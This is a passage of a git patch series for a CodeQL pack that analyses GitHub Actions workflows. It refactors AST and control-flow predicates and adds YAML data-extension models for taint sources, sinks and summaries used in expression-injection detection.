a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate isSink(DataFlow::Node sink) { any() } //predicate neverSkip(DataFlow::Node node) { any() } } diff --git a/ql/src/test/partial.ql b/ql/src/test/partial.ql new file mode 100644 index 00000000000..779749f82f6 --- /dev/null +++ b/ql/src/test/partial.ql @@ -0,0 +1,33 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives taint from $@.", source.getNode(), + "this source" From 9c6fd20e5e6a9b96423c1f3b0cabaf722ff0908f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 12:29:48 +0100 Subject: [PATCH 0016/1267] Move reusable tests to src pack --- ql/{lib => src}/test/.github/workflows/calling_workflow.yml | 0 ql/{lib => src}/test/.github/workflows/reusable_workflow.yml | 0 2 files changed, 0 insertions(+), 0 deletions(-) rename ql/{lib => src}/test/.github/workflows/calling_workflow.yml (100%) rename ql/{lib => src}/test/.github/workflows/reusable_workflow.yml (100%) diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/calling_workflow.yml rename to ql/src/test/.github/workflows/calling_workflow.yml diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/src/test/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/lib/test/.github/workflows/reusable_workflow.yml rename to ql/src/test/.github/workflows/reusable_workflow.yml From b54316fc9ab101bcb6a2e11ac57a888c681cc477 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 13:35:47 +0100 Subject: [PATCH 0017/1267] Refactor CfgScopes and Ast predicate names --- ql/lib/codeql/actions/Ast.qll | 53 +++++++------- .../actions/controlflow/internal/Cfg.qll | 70 +++++++++++-------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 45 ++++-------- .../dataflow/internal/DataFlowPublic.qll | 18 ++--- .../Security/CWE-094/ExpressionInjection.ql | 2 - 6 files changed, 94 insertions(+), 96 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b84f884c034..a25ef856233 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -31,11 +31,9 @@ class Expression extends Statement { } * A Github Actions Workflow */ class WorkflowStmt extends Statement instanceof Actions::Workflow { - JobStmt getAJob() { result = super.getJob(_) } + JobStmt getAJobStmt() { result = super.getJob(_) } - JobStmt getJob(string id) { result = super.getJob(id) } - - predicate isReusable() { this instanceof ReusableWorkflowStmt } + JobStmt getJobStmt(string id) { result = super.getJob(id) } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -45,15 +43,19 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + ReusableWorkflowInputsStmt getInputsStmt() { + result = workflow_call.(YamlMapping).lookup("inputs") + } - OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + ReusableWorkflowOutputsStmt getOutputsStmt() { + result = workflow_call.(YamlMapping).lookup("outputs") + } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class InputsStmt extends Statement instanceof YamlMapping { - InputsStmt() { +class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowInputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } @@ -70,16 +72,16 @@ class InputsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - InputExpr getInputExpr(string name) { + ReusableWorkflowInputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class InputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } -class OutputsStmt extends Statement instanceof YamlMapping { - OutputsStmt() { +class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { + ReusableWorkflowOutputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) } @@ -96,12 +98,12 @@ class OutputsStmt extends Statement instanceof YamlMapping { * description: "The second output string" * value: ${{ jobs.example_job.outputs.output2 }} */ - OutputExpr getOutputExpr(string name) { + ReusableWorkflowOutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class OutputExpr extends Expression instanceof YamlString { } +class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -114,10 +116,10 @@ class JobStmt extends Statement instanceof Actions::Job { string getId() { result = super.getId() } /** Gets the step at the given index within this job. */ - StepStmt getStep(int index) { result = super.getStep(index) } + StepStmt getStepStmt(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ - StepStmt getAStep() { result = super.getStep(_) } + StepStmt getAStepStmt() { result = super.getStep(_) } /** * Gets a needed job. @@ -147,7 +149,7 @@ class JobStmt extends Statement instanceof Actions::Job { * with: * arg1: value1 */ - JobUsesExpr getUsesExpr() { result.getJob() = this } + JobUsesExpr getUsesExpr() { result.getJobStmt() = this } } /** @@ -178,7 +180,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - JobStmt getJob() { result = super.getJob() } + JobStmt getJobStmt() { result = super.getJob() } } /** @@ -189,7 +191,7 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); - abstract Expression getArgument(string key); + abstract Expression getArgumentExpr(string key); } /** @@ -204,7 +206,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { override string getVersion() { result = uses.getVersion() } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { exists(Actions::With with | with.getStep() = this and result = with.lookup(key) @@ -220,7 +222,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) } - JobStmt getJob() { result = this } + JobStmt getJobStmt() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. @@ -255,7 +257,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) } - override Expression getArgument(string key) { + override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -290,8 +292,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } - JobStmt getJob() { result.getAChildNode*() = this } - //override string toString() { result = expr } + JobStmt getJobStmt() { result.getAChildNode*() = this } } /** @@ -313,7 +314,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { string getVarName() { result = varName } - StepStmt getStep() { result.getId() = stepId } + StepStmt getStepStmt() { result.getId() = stepId } } /** @@ -368,7 +369,7 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { Expression getInputExpr() { exists(ReusableWorkflowStmt w | w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputs().getInputExpr(paramName) = result + w.getInputsStmt().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 057d7872ee3..9129ee5dc61 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,7 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - - class JobScope extends CfgScope instanceof JobStmt { } + class WorkflowScope extends CfgScope instanceof WorkflowStmt { } } private module Implementation implements CfgShared::InputSig { @@ -122,15 +120,9 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getInputs(), e) or - first(scope.(JobStmt), e) - } + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(ReusableWorkflowStmt), e, c) or - last(scope.(JobStmt), e, c) - } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -147,21 +139,38 @@ private import CfgImpl private import Completion private import CfgScope -private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getInputs() or child = super.getOutputs()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) + if this instanceof ReusableWorkflowStmt + then + result = + rank[i](Expression child, Location l | + ( + child = this.(ReusableWorkflowStmt).getInputsStmt() or + child = this.(ReusableWorkflowStmt).getOutputsStmt() or + child = this.(ReusableWorkflowStmt).getAJobStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + else + result = + rank[i](Expression child, Location l | + child = super.getAJobStmt() and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -174,9 +183,10 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof InputExpr { } +private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -189,13 +199,17 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and + ( + child = super.getAStepStmt() or + child = super.getOutputStmt() or + child = super.getUsesExpr() + ) and l = child.getLocation() | child @@ -213,7 +227,7 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by @@ -226,7 +240,7 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ead312d8af6..84019aa2727 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -27,7 +27,7 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgument(["source", "replace"]) and + pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and succ.asExpr() = u ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 02b7de847e3..76495e3f80c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -20,14 +20,14 @@ class OutNode extends ExprNode { } /** - * Not used + * Not implemented */ class CastNode extends Node { CastNode() { none() } } /** - * Not used + * Not implemented */ class PostUpdateNode extends Node { PostUpdateNode() { none() } @@ -45,8 +45,6 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) - // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) - // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -84,10 +82,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else - if this instanceof JobStmt - then result = this.(JobStmt).getId() - else none() + else none() } } @@ -105,16 +100,6 @@ class NormalReturn extends ReturnKind, TNormalReturn { /** Gets a viable implementation of the target of the given `Call`. */ DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } -// /** -// * Holds if the set of viable implementations that can be called by `call` -// * might be improved by knowing the call context. -// */ -// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } -// /** -// * Gets a viable dispatch target of `call` in the context `ctx`. This is -// * restricted to those `call`s for which a context might make a difference. -// */ -// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } /** * Gets a node that can read the value returned from `call` with return kind * `kind`. @@ -162,17 +147,17 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Made a string to match the ArgumentPosition type + * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } + ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } } /** @@ -185,7 +170,7 @@ predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -195,7 +180,7 @@ predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -223,7 +208,12 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * a simple local flow step that should always preserve the call context (same callable) @@ -238,12 +228,7 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * AKA teleport steps * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) -} +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 80f504963b9..a14b0693874 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -27,7 +27,7 @@ class Node extends TNode { } /** - * Any Ast Expression + * Any Ast Expression. * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... */ class ExprNode extends Node, TExprNode { @@ -48,34 +48,34 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private ReusableWorkflowInputExpr parameter; ParameterNode() { this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } override string toString() { result = parameter.toString() } override Location getLocation() { result = parameter.getLocation() } - InputExpr getInputExpr() { result = parameter } + ReusableWorkflowInputExpr getInputExpr() { result = parameter } } /** - * An argument to a Uses step (call) + * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -87,7 +87,7 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 2fe6f17dfb6..f8d6e0c804b 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,8 +24,6 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } - //predicate isSink(DataFlow::Node sink) { any() } - //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 2eaca7e826c8f990d999696990e1e6a2d43c9992 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 22:49:54 +0100 Subject: [PATCH 0018/1267] Add support for external definitions --- .../codeql/actions/dataflow/ExternalFlow.qll | 31 ++++++++++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 23 +++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 ++++++++++++------- .../internal/ExternalFlowExtensions.qll | 20 ++++++++++++ ql/lib/ext/sinks.model.yml | 11 +++++++ ql/lib/ext/sources.model.yml | 11 +++++++ ql/lib/ext/summaries.model.yml | 19 +++++++++++ ql/lib/qlpack.yml | 8 +++-- ql/lib/test/test.ql | 13 ++++++-- .../Security/CWE-094/ExpressionInjection.ql | 6 +++- 10 files changed, 150 insertions(+), 24 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/ExternalFlow.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll create mode 100644 ql/lib/ext/sinks.model.yml create mode 100644 ql/lib/ext/sources.model.yml create mode 100644 ql/lib/ext/summaries.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 00000000000..6e02e4036ba --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -0,0 +1,31 @@ +private import internal.ExternalFlowExtensions as Extensions +import codeql.actions.DataFlow +import actions + +/** Holds if a source model exists for the given parameters. */ +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate summaryModel(string action, string version, string input, string output, string kind) { + Extensions::summaryModel(action, version, input, output, kind) +} + +/** Holds if a sink model exists for the given parameters. */ +predicate sinkModel(string action, string version, string input, string kind) { + Extensions::sinkModel(action, version, input, kind) +} + +predicate sinkNode(DataFlow::ExprNode sink, string kind) { + exists(UsesExpr uses, string action, string version, string input | + uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and + sinkModel(action, version, input, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) + ) +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 3e6a6141767..3bde829321f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A data flow source. @@ -124,14 +125,22 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getCallee() = "tj-actions/changed-files" and - uses.getVersion() = ["v10", "v20", "v30", "v40"] and - uses = this.asExpr() +private class ExternallyDefinedSource extends RemoteFlowSource { + string soutceType; + + ExternallyDefinedSource() { + exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | + sourceModel(action, version, _, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + uses = this.asExpr() and + soutceType = kind ) } - override string getSourceType() { result = "User-controlled list of changed files" } + override string getSourceType() { result = soutceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 84019aa2727..e5fa04427cc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ import actions private import codeql.util.Unit private import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. @@ -20,16 +21,23 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if actions-find-and-replace-string step is used. - */ -private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr uses, string action, string version, string input | + /*, string output */ summaryModel(action, version, input, _, "taint") and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and + succ.asExpr() = uses + ) +} + +private class ExternallyDefinedSummary extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr u | - u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and - succ.asExpr() = u - ) + externallyDefinedSummary(pred, succ) } } @@ -46,10 +54,12 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { * echo "::set-output name=initial_url::$INITIAL_URL" */ private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + runEnvToScriptstep(pred, succ) + } } -predicate test(DataFlow::Node pred, DataFlow::Node succ) { +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(RunExpr r, string varName | r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 00000000000..89cf4de0261 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -0,0 +1,20 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate sourceModel(string action, string version, string output, string kind); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate summaryModel( + string action, string version, string input, string output, string kind +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate sinkModel(string action, string version, string input, string kind); diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml new file mode 100644 index 00000000000..e28ec39d1be --- /dev/null +++ b/ql/lib/ext/sinks.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sinkModel + data: + - [ + "FAKE-mad9000/actions-find-and-replace-string", + "*", + "source", + "expression-injection", + ] diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml new file mode 100644 index 00000000000..666a5532865 --- /dev/null +++ b/ql/lib/ext/sources.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ + "tj-actions/changed-files", + "v10, v20, v30, v40", + "all_changed_file", + "PR", + ] diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml new file mode 100644 index 00000000000..cc8e2df5fe9 --- /dev/null +++ b/ql/lib/ext/summaries.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: summaryModel + data: + - [ + "mad9000/actions-find-and-replace-string", + "*", + "source, replace", + "value", + "taint", + ] + - [ + "frabert/replace-string-action", + "*", + "string, replace-with", + "replaced", + "taint", + ] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 325c63f4625..8cf5ba69354 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -5,11 +5,13 @@ name: codeql/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 - codeql/yaml: '*' - codeql/util: '*' + codeql/yaml: "*" + codeql/util: "*" codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml tests: test groups: - - yaml + - yaml +dataExtensions: + - ext/*.model.yml diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 8d558cbaacd..fe76852fa53 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -3,6 +3,7 @@ import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations +import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } @@ -19,7 +20,7 @@ query predicate stepUsesNodes(StepUsesExpr s) { any() } query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { - call.getArgument(argname) = arg + call.getArgumentExpr(argname) = arg } query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } @@ -48,7 +49,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof OutputsStmt + n.getAstNode() instanceof ReusableWorkflowOutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -68,3 +69,11 @@ query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } + +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) +} + +query predicate summaries(string action, string version, string input, string output, string kind) { + summaryModel(action, version, input, output, kind) +} diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b..7953c3b037c 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 